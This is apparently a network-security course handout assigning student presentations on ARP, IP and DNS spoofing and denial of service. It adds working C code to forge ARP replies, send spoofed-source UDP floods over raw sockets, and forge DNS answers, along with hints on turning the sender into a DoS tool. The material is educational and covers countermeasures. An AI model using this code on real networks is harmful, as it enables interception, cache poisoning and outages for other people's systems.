Presentations/research
- A good link/research to get started
- Basic idea - how does it work, including a good picture/diagram or a few
- Famous example(s) - bad, good
- How to do it? Source code and/or utilities and/or configuration/commands on the system.
- Countermeasures
- If possible, do it on your local network at home, and if possible demo that during class.
- Make some slides or notes, ~cs473xy/public_html/h6, and also put source code or any other files there.
    mkdir ~/public_html
    chmod a+x ~
    chmod a+rx ~/public_html
- When you have something, send it to Jeff for review, a day ahead of time if possible.

ARP spoofing - cs47303. April 6.
* stateful versus stateless protocol (ARP is stateless: a host will accept a reply it never asked for)
* Questions -
  + How to do it? Source code?
  + Famous example(s)
* Slides - check link in Teams
* Tasks -
  + Connect a new device to the network, see what ARP messages show up in Wireshark. Does the MAC address of the new device get broadcast to the entire network? Probably yes. Is there a way to make it so it only broadcasts to the switch and not to other devices? Does the computer itself send the ARP message, or does the switch?
  + ettercap - check the video in Teams, target a device on your network, enter a username in http (not https) and see if it shows up in ettercap

MAC spoofing - cs47301.
* https://en.wikipedia.org/wiki/MAC_spoofing
* https://www.ionos.com/digitalguide/server/know-how/what-is-mac-spoofing/
* https://www.howtogeek.com/192173/how-and-why-to-change-your-mac-address-on-windows-linux-and-mac/
* Questions -
  + Commands to do this on Windows, Mac, Linux?
  + What would the C code look like, or is there really C code for this?
  + Software that licenses based on MAC address - example?
  + Filtering software that uses this, and how exactly?
  + Countermeasures?
  + Famous example(s)

IP spoofing - cs47302.
* wikipedia -
* https://www.iplocation.net/ip-spoofing
* https://www.cloudflare.com/learning/ddos/glossary/ip-spoofing/
* https://www.ionos.com/digitalguide/server/security/ip-spoofing-fundamentals-and-counter-measures/
* https://sites.google.com/site/cacsolin/mitnick--shimomura
* http://wiki.cas.mcmaster.ca/index.php/The_Mitnick_attack
* Basic idea - build IP packets yourself with a different source IP address, and send them.
* Why? DoS - (a) use many source IPs, which costs the target more resources and defeats blocking a single address, (b) anything malicious, to make it less traceable.
* Questions -
  + Source code for doing this? Probably can use pcap (raw sockets also work).
  + Other reasons? Any good reasons? Testing.
  + Countermeasures?
  + Famous example(s)
* Tasks -
  + DoS on your local network
  + Set a static IP address on your computer at home
    - use one that's not taken, verify it works. You can use ettercap to see which IP addresses are taken. Also monitor in Wireshark. Also check in your router configuration.
    - use one that is taken, see what happens on both devices.
  + Write a DoS program in C: ./DoS IP_address port(s)
    - forever loop sending lots of traffic to those ports - lots of writes, lots of new connections
    - Note - you would potentially set a static IP address and change your MAC address before doing this.
    - Note - only do this on your local network
  + Try out pentmenu
  + DoS where you continuously change your IP address - in C you use raw sockets.

DNS spoofing - cs47304. Give us the basic overview of DNS.
* wikipedia -
* Why? Stealing traffic
* Questions -
  + How to do it?
  + Countermeasures?
  + Good uses?
  + How does DNS work - A and NS records and such
  + Famous example(s)

Denial of Service - cs47305. How it works, example code, and a famous example or two.
* wikipedia -
* Questions -
  + How to do it? Example code and/or tools.
  + Countermeasures?
  + Good uses?
  + Famous example(s)

https - cs47306 - similar to looking at TCP: how does it work, what goes back and forth, can we see this in Wireshark?

IP routing - Jeff, maybe - how does a packet actually get to its destination. Send to 139.102.14.201 - what happens when the packet leaves my house?
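For the ARP spoofing section ("How to do it? Source code?"), here is an added example of the one packet the whole attack rests on. It is not code from the course page; the MAC and IP addresses in it are made up (attacker 02:00:00:00:00:aa, victim 10.0.0.20, gateway 10.0.0.1). Because ARP is stateless, most stacks will overwrite an existing cache entry when an unsolicited reply like this one arrives, which is why ettercap's attack is simply to keep sending such replies.

```c
/* Forged ARP reply builder (Ethernet II + ARP). Added example for the ARP
 * spoofing section; it is not code from the course page. The scenario is
 * made up: attacker MAC 02:00:00:00:00:aa tells the victim (10.0.0.20,
 * 02:00:00:00:00:20) that the gateway address 10.0.0.1 belongs to the attacker. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ETH_HDR   14
#define ARP_LEN   28
#define FRAME_LEN (ETH_HDR + ARP_LEN)

static void put16(uint8_t *p, uint16_t v) { p[0] = v >> 8; p[1] = v & 0xff; }

/* Writes the 42-byte frame into frame; returns its length, or 0 on a NULL buffer. */
size_t build_arp_reply(uint8_t *frame,
                       const uint8_t attacker_mac[6], const uint8_t claimed_ip[4],
                       const uint8_t victim_mac[6],   const uint8_t victim_ip[4])
{
    if (!frame) return 0;
    uint8_t *eth = frame, *arp = frame + ETH_HDR;

    /* Ethernet header: unicast to the victim, from the attacker, EtherType ARP */
    memcpy(eth, victim_mac, 6);
    memcpy(eth + 6, attacker_mac, 6);
    put16(eth + 12, 0x0806);

    /* ARP body, RFC 826 layout */
    put16(arp + 0, 1);                  /* HTYPE: Ethernet */
    put16(arp + 2, 0x0800);             /* PTYPE: IPv4 */
    arp[4] = 6;                         /* HLEN */
    arp[5] = 4;                         /* PLEN */
    put16(arp + 6, 2);                  /* OPER: 2 = reply */
    memcpy(arp + 8,  attacker_mac, 6);  /* sender MAC: the attacker ... */
    memcpy(arp + 14, claimed_ip, 4);    /* ... claiming the gateway's IP: this pair poisons the cache */
    memcpy(arp + 18, victim_mac, 6);    /* target MAC */
    memcpy(arp + 24, victim_ip, 4);     /* target IP */
    return FRAME_LEN;
}

/* Decoder for checking a frame (ours or one from a capture):
 * returns the ARP opcode (1 request, 2 reply), or -1 if this is not a full ARP frame. */
int arp_opcode(const uint8_t *frame, size_t len)
{
    if (len < FRAME_LEN || frame[12] != 0x08 || frame[13] != 0x06) return -1;
    return (frame[20] << 8) | frame[21];
}

/* Demo frame for the made-up scenario; build_demo_frame() fills it and returns its length. */
uint8_t demo_frame[FRAME_LEN];

size_t build_demo_frame(void)
{
    const uint8_t attacker[6]  = {0x02,0,0,0,0,0xaa};
    const uint8_t victim[6]    = {0x02,0,0,0,0,0x20};
    const uint8_t gw_ip[4]     = {10,0,0,1};
    const uint8_t victim_ip[4] = {10,0,0,20};
    return build_arp_reply(demo_frame, attacker, gw_ip, victim, victim_ip);
}

int main(void)
{
    size_t n = build_demo_frame();
    for (size_t i = 0; i < n; i++)
        printf("%02x%c", demo_frame[i], (i % 16 == 15 || i + 1 == n) ? '\n' : ' ');
    return 0;
}
```

To actually inject the frame on Linux, write the 42 bytes to an AF_PACKET / SOCK_RAW socket bound to the interface (struct sockaddr_ll), or hand the buffer to libpcap's pcap_inject(); both need root. A full man-in-the-middle sends a second reply to the gateway claiming the victim's IP, re-sends both every few seconds because cache entries expire, and enables IP forwarding so the victim's traffic still flows. Countermeasures to mention in the presentation: static ARP entries on the hosts that matter, and Dynamic ARP Inspection on managed switches, which drops replies whose sender MAC/IP pair does not match the DHCP snooping table.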
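For the IP spoofing section ("Source code for doing this?" and "DoS where you continuously change your IP address - in C you use raw sockets"), here is an added example that builds an IPv4/UDP datagram with whatever source address you choose and, in main(), sends a handful of them from a raw socket, each from a different fake source. It is not code from the course page. The addresses are from the documentation ranges 203.0.113.0/24 and 192.0.2.0/24 and the ports are made up; the sending part assumes Linux, where IPPROTO_RAW implies IP_HDRINCL, and needs root.

```c
/* Spoofed-source IPv4/UDP builder. Added example for the IP spoofing section;
 * not code from the course page. Sample addresses are documentation ranges
 * (203.0.113.0/24, 192.0.2.0/24) and the port numbers are arbitrary. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define IP_HLEN  20
#define UDP_HLEN 8

static void put16(uint8_t *p, uint16_t v) { p[0] = v >> 8; p[1] = v & 0xff; }

/* RFC 1071 one's-complement checksum over len bytes (big-endian 16-bit words).
 * Run over a finished header it returns 0, which is how receivers verify it. */
uint16_t ip_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2) sum += (uint32_t)(data[i] << 8 | data[i + 1]);
    if (len & 1) sum += (uint32_t)data[len - 1] << 8;
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Writes IP header + UDP header + payload into pkt; returns the total length,
 * or 0 on bad input. pkt must hold IP_HLEN + UDP_HLEN + plen bytes. The UDP
 * checksum is left 0, which IPv4 permits (it means "not computed"). */
size_t build_spoofed_udp(uint8_t *pkt, const uint8_t src[4], const uint8_t dst[4],
                         uint16_t sport, uint16_t dport,
                         const uint8_t *payload, size_t plen)
{
    size_t total = IP_HLEN + UDP_HLEN + plen;
    if (!pkt || total > 65535) return 0;
    memset(pkt, 0, IP_HLEN + UDP_HLEN);
    pkt[0] = 0x45;                       /* version 4, IHL 5 (20-byte header) */
    put16(pkt + 2, (uint16_t)total);     /* total length */
    put16(pkt + 4, 0x1234);              /* identification: arbitrary */
    put16(pkt + 6, 0x4000);              /* flags: DF, fragment offset 0 */
    pkt[8] = 64;                         /* TTL */
    pkt[9] = 17;                         /* protocol: UDP */
    memcpy(pkt + 12, src, 4);            /* the spoofed source address */
    memcpy(pkt + 16, dst, 4);
    put16(pkt + 10, ip_checksum(pkt, IP_HLEN));   /* computed with the field zeroed */
    put16(pkt + 20, sport);
    put16(pkt + 22, dport);
    put16(pkt + 24, (uint16_t)(UDP_HLEN + plen));
    if (plen) memcpy(pkt + 28, payload, plen);
    return total;
}

/* xorshift32: a fresh source address for every packet. Toy generator, not
 * cryptographic; any value works because replies never need to reach us. */
void next_random_source(uint8_t src[4], uint32_t *state)
{
    uint32_t x = *state ? *state : 0x9e3779b9u;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    *state = x;
    src[0] = x >> 24; src[1] = x >> 16; src[2] = x >> 8; src[3] = x;
}

/* Demo packet for the made-up scenario; build_demo_packet() fills it and returns its length. */
uint8_t demo_packet[IP_HLEN + UDP_HLEN + 4];

size_t build_demo_packet(void)
{
    const uint8_t src[4] = {203,0,113,7}, dst[4] = {192,0,2,1};
    const uint8_t payload[4] = {'p','i','n','g'};
    return build_spoofed_udp(demo_packet, src, dst, 40000, 9999, payload, sizeof payload);
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <dst-ip>  (root, Linux, your own LAN only)\n", argv[0]); return 1; }
    struct sockaddr_in sin = {0};
    sin.sin_family = AF_INET;
    if (inet_pton(AF_INET, argv[1], &sin.sin_addr) != 1) { fprintf(stderr, "bad address\n"); return 1; }
    uint8_t dst[4], src[4], pkt[64];
    uint32_t seed = 1;
    memcpy(dst, &sin.sin_addr, 4);       /* s_addr is already in network byte order */
    int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);   /* Linux: IPPROTO_RAW implies IP_HDRINCL */
    if (s < 0) { perror("socket"); return 1; }
    for (int i = 0; i < 10; i++) {       /* ten packets, each from a different fake source */
        next_random_source(src, &seed);
        size_t n = build_spoofed_udp(pkt, src, dst, 40000, 9999, (const uint8_t *)"ping", 4);
        if (sendto(s, pkt, n, 0, (struct sockaddr *)&sin, sizeof sin) < 0) perror("sendto");
    }
    return 0;
}
```

Watch the packets in Wireshark while this runs: the source column changes on every datagram even though they all come from one machine, which is exactly what the "harder to trace / harder to block" argument in the notes is about. The flip side, and the main countermeasure to present, is egress/ingress filtering (BCP 38): a router that drops packets whose source address does not belong to the network they arrived from stops these at the first hop. Turning this into the ./DoS loop from the tasks is just removing the `i < 10` bound; keep it on your own LAN.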
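For the DNS spoofing section ("How to do it?" and "How does DNS work - A and NS records and such"), here is an added example, not code from the course page, that forges the A-record answer a resolver would accept for a query it just sent. The query bytes are constructed here (transaction ID 0x1a2b, www.example.com, type A) and the answer address 203.0.113.9 is made up. The attack works because a resolver matches a reply only on the 16-bit transaction ID, the question, and the UDP source/destination ports, and takes the first matching reply; the forger sniffs the query (or guesses the ID), sends this packet with the real server's address as the spoofed source, and wins the race.

```c
/* Forged DNS A-record response. Added example for the DNS spoofing section;
 * not code from the course page. demo_query is a constructed query for
 * www.example.com (ID 0x1a2b) and 203.0.113.9 is a made-up answer address. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define DNS_HDR 12

static void put16(uint8_t *p, uint16_t v) { p[0] = v >> 8; p[1] = v & 0xff; }
static void put32(uint8_t *p, uint32_t v) { put16(p, v >> 16); put16(p + 2, v & 0xffff); }

/* Length of the question section (QNAME + QTYPE + QCLASS), or 0 if malformed.
 * Only uncompressed names are handled, which is all a query ever carries. */
size_t dns_question_len(const uint8_t *q, size_t qlen)
{
    size_t i = DNS_HDR;
    while (i < qlen && q[i] != 0) {
        if (q[i] >= 64) return 0;      /* compression pointer: not valid in a query name */
        i += 1 + q[i];                 /* skip one label: length byte + label bytes */
    }
    if (i + 5 > qlen) return 0;        /* terminating zero + QTYPE + QCLASS must fit */
    return i + 5 - DNS_HDR;
}

/* Transaction ID of a DNS message (the value the forger must match). */
uint16_t dns_txid(const uint8_t *msg) { return (uint16_t)(msg[0] << 8 | msg[1]); }

/* Builds the forged response into out (must hold qlen + 16 bytes).
 * Returns the response length, or 0 if the query could not be parsed. */
size_t build_dns_answer(uint8_t *out, const uint8_t *query, size_t qlen,
                        const uint8_t a_ip[4], uint32_t ttl)
{
    size_t qsec = dns_question_len(query, qlen);
    if (qsec == 0) return 0;
    memcpy(out, query, DNS_HDR + qsec);    /* same ID, same question: what the resolver matches on */
    put16(out + 2, 0x8180);                /* QR=1 (response), RD=1, RA=1, RCODE=0 */
    put16(out + 6, 1);                     /* ANCOUNT = 1 */
    put16(out + 8, 0);                     /* NSCOUNT = 0: no NS records */
    put16(out + 10, 0);                    /* ARCOUNT = 0 */
    uint8_t *rr = out + DNS_HDR + qsec;    /* answer RR follows the question */
    put16(rr + 0, 0xC00C);                 /* NAME: pointer to the question name at offset 12 */
    put16(rr + 2, 1);                      /* TYPE A */
    put16(rr + 4, 1);                      /* CLASS IN */
    put32(rr + 6, ttl);                    /* long TTL keeps the poisoned entry cached */
    put16(rr + 10, 4);                     /* RDLENGTH: an IPv4 address */
    memcpy(rr + 12, a_ip, 4);
    return DNS_HDR + qsec + 16;
}

/* Constructed sample query: ID 0x1a2b, flags 0x0100 (standard query, RD),
 * QDCOUNT 1, question "www.example.com" type A class IN. */
static const uint8_t demo_query[] = {
    0x1a,0x2b, 0x01,0x00, 0x00,0x01, 0x00,0x00, 0x00,0x00, 0x00,0x00,
    3,'w','w','w', 7,'e','x','a','m','p','l','e', 3,'c','o','m', 0,
    0x00,0x01, 0x00,0x01
};
uint8_t demo_answer[sizeof demo_query + 16];

/* Fills demo_answer with the forged reply and returns its length. */
size_t build_demo_answer(void)
{
    const uint8_t fake_ip[4] = {203,0,113,9};
    return build_dns_answer(demo_answer, demo_query, sizeof demo_query, fake_ip, 86400);
}
```

Delivery is the previous example's spoofed-source UDP builder with the real DNS server's address as the source, destination port equal to the resolver's query source port, and this buffer as the payload. That dependency is also the countermeasure story: resolvers randomize both the transaction ID and the source port so an off-path attacker has roughly 2^32 guesses instead of 2^16, and DNSSEC lets the resolver reject a forged answer outright because it carries no valid signature. On a LAN, ettercap's dns_spoof plugin does the sniff-and-race for you, so the in-class demo and this code should show the same thing in Wireshark: two replies to one query, and the client using the first.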